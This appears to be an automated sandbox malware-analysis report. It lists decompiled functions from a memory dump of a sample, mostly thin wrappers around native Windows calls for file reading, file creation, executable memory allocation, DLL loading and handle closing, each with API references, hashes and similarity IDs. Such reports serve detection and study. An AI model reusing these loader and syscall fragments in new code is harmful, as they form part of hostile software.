				_t29 = _a4 + 0xc48;
				E00418DB0(_t27, _t13, _t29,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t6 =  &_a32; // 0x413d42
				_t12 =  &_a8; // 0x413d42
				_t18 =  *((intOrPtr*)( *_t29))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40, _t28); // executed
				return _t18;
			}

0x00418262
0x00418263
0x0041826f
0x00418277
0x00418282
0x0041829d
0x004182a5
0x004182a9

APIs

NtReadFile.NTDLL(B=A,5E972F59,FFFFFFFF,00413A01,?,?,B=A,?,00413A01,FFFFFFFF,5E972F59,00413D42,?,00000000), ref: 004182A5

Strings

B=A, xrefs: 0041829D, 004182A4
B=A, xrefs: 00418282, 00418290

Memory Dump Source

Source File: 00000007.00000002.2198746522.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileRead
String ID: B=A$B=A
API String ID: 2738559852-2767357659
Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction ID: 36fb0ef1660234b95adbc5e615de389476f61a426637268b67c73261640a8fd9
Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction Fuzzy Hash: 2AF0A4B2200208ABCB14DF89DC81EEB77ADAF8C754F158249BA1D97241DA30E8518BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00409B10, Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00409B10(void* __ebx, void* __edi, void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t32;
				void* _t33;
				void* _t34;

				_v8 =  &_v536;
				_t15 = E0041AB40( &_v12, 0x104, _a8);
				_t33 = _t32 + 0xc;
				if(_t15 != 0) {
					_t17 = E0041AF60(__eflags, _v8);
					_t34 = _t33 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E0041B1E0(__ebx, __edi,  &_v12, 0);
						_t34 = _t34 + 8;
					}
					_t18 = E004192F0(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}

0x00409b2c
0x00409b2f
0x00409b34
0x00409b39
0x00409b43
0x00409b48
0x00409b4b
0x00409b4d
0x00409b55
0x00409b5a
0x00409b5a
0x00409b61
0x00409b69
0x00409b6c
0x00409b6e
0x00409b82
0x00000000
0x00409b84
0x00409b8a
0x00409b3e
0x00409b3e
0x00409b3e

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409B82

Memory Dump Source

Source File: 00000007.00000002.2198746522.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
Instruction ID: 046ff59bb8e44ad8641c0e43070f5aeaf3db9792b4ffc4f87dfb9ba9f6fb7e9c
Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
Instruction Fuzzy Hash: D70112B5D4010DB7DF10EAE5DC42FDEB378AB54318F1041A5E908A7281F635EB54C795

Uniqueness

Uniqueness Score: -1.00%

Function 004181B0, Relevance: 1.5, APIs: 1, Instructions: 40
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004181B0(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;

				_t3 = _a4 + 0xc40; // 0xc40
				E00418DB0(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}

0x004181bf
0x004181c7
0x004181fd
0x00418201

APIs

NtCreateFile.NTDLL(00000060,00408AE3,?,00413B87,00408AE3,FFFFFFFF,?,?,FFFFFFFF,00408AE3,00413B87,?,00408AE3,00000060,00000000,00000000), ref: 004181FD

Memory Dump Source

Source File: 00000007.00000002.2198746522.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction ID: 1505d2c2fac7169f29cf6ab97caa2a59105c471fc85729d0552dd22f4c6ed161
Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction Fuzzy Hash: D7F0B6B2200208ABCB48CF89DC85DEB77ADAF8C754F158248BA0D97241C630E8518BA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041838B, Relevance: 1.5, APIs: 1, Instructions: 32
memorynativeCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E0041838B(signed int __ebx, intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t16;
				void* _t25;
				signed int _t29;

				_t18 = __ebx & _t29;
				asm("outsd");
				 *((intOrPtr*)(_t18 + 0x55)) =  *((intOrPtr*)((__ebx & _t29) + 0x55)) - _t18;
				_push(_t29);
				_t12 = _a4;
				_t5 = _t12 + 0xc60; // 0xca0
				E00418DB0(_t25, _a4, _t5,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t16 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t16;
			}

0x0041838b
0x0041838d
0x0041838e
0x00418390
0x00418393
0x0041839f
0x004183a7
0x004183c9
0x004183cd

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418F84,?,00000000,?,00003000,00000040,00000000,00000000,00408AE3), ref: 004183C9

Memory Dump Source

Source File: 00000007.00000002.2198746522.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 90b4b4d6a87fec0e3ee07628d04621249aeea7168c3680a55fd00696984ddb13
Instruction ID: e33716c473c1a6e546ff089dea15d4fac4e1bd4e2ae9c8d374149b142e10dc26
Opcode Fuzzy Hash: 90b4b4d6a87fec0e3ee07628d04621249aeea7168c3680a55fd00696984ddb13
Instruction Fuzzy Hash: 1BF0F2B6200208ABCB18DF99DC95EEB77A9BF88354F15815DBE1897241C630E950CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00418390, Relevance: 1.5, APIs: 1, Instructions: 30
memorynativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00418390(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				_t3 = _a4 + 0xc60; // 0xca0
				E00418DB0(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}

0x0041839f
0x004183a7
0x004183c9
0x004183cd

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418F84,?,00000000,?,00003000,00000040,00000000,00000000,00408AE3), ref: 004183C9

Memory Dump Source

Source File: 00000007.00000002.2198746522.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction ID: c1f36b05bbd4b7963809c3793a6f2df241a2ee7dc34c60eca979b2d1d68cf477
Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction Fuzzy Hash: 1DF015B2200208ABCB14DF89DC81EEB77ADAF88754F118149BE0897241CA30F810CBE4

Uniqueness

Uniqueness Score: -1.00%

Function 004182E0, Relevance: 1.5, APIs: 1, Instructions: 20
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004182E0(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x409733
				E00418DB0(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}

0x004182e3
0x004182e6
0x004182ef
0x004182f7
0x00418305
0x00418309

APIs

NtClose.NTDLL(00413D20,?,?,00413D20,00408AE3,FFFFFFFF), ref: 00418305

Memory Dump Source

Source File: 00000007.00000002.2198746522.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction ID: 2c2b34aedc846ab3ae484734a1171ee081eb0df99b6426d3cac892bcac86a451
Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction Fuzzy Hash: 7CD012752003146BD710EF99DC45ED7775CEF44750F154459BA185B242C930F90086E4

Uniqueness

Uniqueness Score: -1.00%

Function 008C00C4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 008C00CF

Memory Dump Source

Source File: 00000007.00000002.2199608978.00000000008B0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000007.00000002.2199601831.00000000008A0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199790772.0000000000990000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199797290.00000000009A0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199803645.00000000009A4000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199809684.00000000009A7000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199815552.00000000009B0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199906185.0000000000A10000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846

Uniqueness

Uniqueness Score: -1.00%

Function 008C0048, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 008C0053

Memory Dump Source

Source File: 00000007.00000002.2199608978.00000000008B0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000007.00000002.2199601831.00000000008A0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199790772.0000000000990000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199797290.00000000009A0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199803645.00000000009A4000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199809684.00000000009A7000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199815552.00000000009B0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199906185.0000000000A10000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
Instruction ID: 41e4343c146f66e2bb318e135f4e172b2897deff735033a37a94e91f6413aa4b
Opcode Fuzzy Hash: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
Instruction Fuzzy Hash: DBB012B2100540C7E3099714D946B4B7210FB90F00F40C93BA11B81861DB3C993CD46A

Uniqueness

Uniqueness Score: -1.00%

Function 008C0078, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 008C0086

Memory Dump Source

Source File: 00000007.00000002.2199608978.00000000008B0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000007.00000002.2199601831.00000000008A0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199790772.0000000000990000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199797290.00000000009A0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199803645.00000000009A4000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199809684.00000000009A7000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199815552.00000000009B0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199906185.0000000000A10000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
Instruction ID: 3a645d05db048e5a2937cf36c3d58d647fc753ae06e93f94360992995f7f05c0
Opcode Fuzzy Hash: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
Instruction Fuzzy Hash: 2AB012B1504640C7F304F704D905B16B212FBD0F00F408938A14F86591D73DAD2CC78B

Uniqueness

Uniqueness Score: -1.00%

Function 008C07AC, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 008C07B7

Memory Dump Source

Source File: 00000007.00000002.2199608978.00000000008B0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000007.00000002.2199601831.00000000008A0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199790772.0000000000990000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199797290.00000000009A0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199803645.00000000009A4000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199809684.00000000009A7000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199815552.00000000009B0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199906185.0000000000A10000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
Instruction ID: cdb92b4df541c6703467cf01e2fb590a315ac15b2f911c24ec3250dccee83ae6
Opcode Fuzzy Hash: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
Instruction Fuzzy Hash: 64B01272200540C7E3099724D906B4B7310FB80F00F008D3AE04781892DB78992CD487

Uniqueness

Uniqueness Score: -1.00%

Function 008BF9F0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 008BF9FB

Memory Dump Source

Source File: 00000007.00000002.2199608978.00000000008B0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000007.00000002.2199601831.00000000008A0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199790772.0000000000990000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199797290.00000000009A0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199803645.00000000009A4000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199809684.00000000009A7000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199815552.00000000009B0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199906185.0000000000A10000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A

Uniqueness

Uniqueness Score: -1.00%

Function 008BF900, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 008BF90E

Memory Dump Source

Source File: 00000007.00000002.2199608978.00000000008B0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000007.00000002.2199601831.00000000008A0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199790772.0000000000990000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199797290.00000000009A0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199803645.00000000009A4000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199809684.00000000009A7000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199815552.00000000009B0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199906185.0000000000A10000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587

Uniqueness

Uniqueness Score: -1.00%

Function 008BFAD0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 008BFADB

Memory Dump Source

Source File: 00000007.00000002.2199608978.00000000008B0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000007.00000002.2199601831.00000000008A0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199790772.0000000000990000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199797290.00000000009A0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199803645.00000000009A4000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199809684.00000000009A7000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199815552.00000000009B0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199906185.0000000000A10000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
Instruction ID: b885d126f35a04098635745a666b93c7a8e67e4acbf17db3f6051f78ecae7b76
Opcode Fuzzy Hash: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
Instruction Fuzzy Hash: 9AB01273104944C7E349A714DD06B8B7210FBC0F01F00893AA00786851DB389A2CE986

Uniqueness

Uniqueness Score: -1.00%

Function 008BFAE8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 008BFAF3

Memory Dump Source

Source File: 00000007.00000002.2199608978.00000000008B0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000007.00000002.2199601831.00000000008A0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199790772.0000000000990000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199797290.00000000009A0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199803645.00000000009A4000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199809684.00000000009A7000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199815552.00000000009B0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199906185.0000000000A10000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456

Uniqueness

Uniqueness Score: -1.00%

Function 008BFBB8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 008BFBC3

Memory Dump Source

Source File: 00000007.00000002.2199608978.00000000008B0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000007.00000002.2199601831.00000000008A0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199790772.0000000000990000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199797290.00000000009A0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199803645.00000000009A4000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199809684.00000000009A7000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199815552.00000000009B0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199906185.0000000000A10000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A

Uniqueness

Uniqueness Score: -1.00%

Function 008BFB68, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 008BFB73

Memory Dump Source

Source File: 00000007.00000002.2199608978.00000000008B0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000007.00000002.2199601831.00000000008A0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199790772.0000000000990000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199797290.00000000009A0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199803645.00000000009A4000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199809684.00000000009A7000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199815552.00000000009B0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199906185.0000000000A10000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446

Uniqueness

Uniqueness Score: -1.00%

Function 008BFC90, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 008BFC9B

Memory Dump Source

Source File: 00000007.00000002.2199608978.00000000008B0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000007.00000002.2199601831.00000000008A0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199790772.0000000000990000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199797290.00000000009A0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199803645.00000000009A4000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199809684.00000000009A7000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199815552.00000000009B0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199906185.0000000000A10000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
Instruction ID: 41c45e5f09b42d6e0ddb2dc3248e04f5cc5ab51982cd1fe1d329002f24c15819
Opcode Fuzzy Hash: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
Instruction Fuzzy Hash: 14B01272104580C7E349AB14D90AB5BB210FB90F00F40893AE04B81850DA3C992CC546

Uniqueness

Uniqueness Score: -1.00%

Function 008BFC60, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 008BFC6B

Memory Dump Source

Source File: 00000007.00000002.2199608978.00000000008B0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000007.00000002.2199601831.00000000008A0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199790772.0000000000990000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199797290.00000000009A0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199803645.00000000009A4000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199809684.00000000009A7000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199815552.00000000009B0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199906185.0000000000A10000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A

Uniqueness

Uniqueness Score: -1.00%

Function 008BFD8C, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 008BFD9A

Memory Dump Source

Source File: 00000007.00000002.2199608978.00000000008B0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000007.00000002.2199601831.00000000008A0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199790772.0000000000990000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199797290.00000000009A0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199803645.00000000009A4000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199809684.00000000009A7000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199815552.00000000009B0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199906185.0000000000A10000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686

Uniqueness

Uniqueness Score: -1.00%

Function 008BFDC0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 008BFDCB

Memory Dump Source

Source File: 00000007.00000002.2199608978.00000000008B0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000007.00000002.2199601831.00000000008A0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199790772.0000000000990000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199797290.00000000009A0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199803645.00000000009A4000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199809684.00000000009A7000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199815552.00000000009B0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199906185.0000000000A10000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486

Uniqueness

Uniqueness Score: -1.00%

Function 008BFEA0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

